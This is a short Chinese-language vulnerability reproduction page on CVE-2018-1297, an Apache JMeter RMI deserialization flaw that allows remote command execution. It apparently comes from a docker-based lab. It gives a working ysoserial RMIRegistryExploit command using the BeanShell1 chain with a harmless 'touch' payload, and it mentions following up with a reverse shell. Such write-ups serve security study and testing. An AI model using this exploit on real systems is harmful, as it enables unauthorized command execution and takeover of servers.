menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2018-1297)Apache Jmeter RMI 反序列化命令执行漏洞 chevron_right (CVE-2018-1297)Apache Jmeter RMI 反序列化命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2018-1297)Apache Jmeter RMI 反序列化命令执行漏洞.md
    863 B / 2021-07-15 19:48:02
        (CVE-2018-1297)Apache Jmeter RMI 反序列化命令执行漏洞
=======================================================

一、漏洞简介
------------

Apache
JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。

二、漏洞影响
------------

Apache JMeter 2.x版本Apache JMeter 3.x版本

三、复现过程
------------

直接使用ysoserial即可进行利用:

    java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit ip 1099 BeanShell1 'touch /tmp/success'

我们使用的是BeanShell1这条利用链。使用`docker-compose exec jmeter bash`进入容器,`/tmp/success`已成功创建:

反弹shell即可
    links
    file_download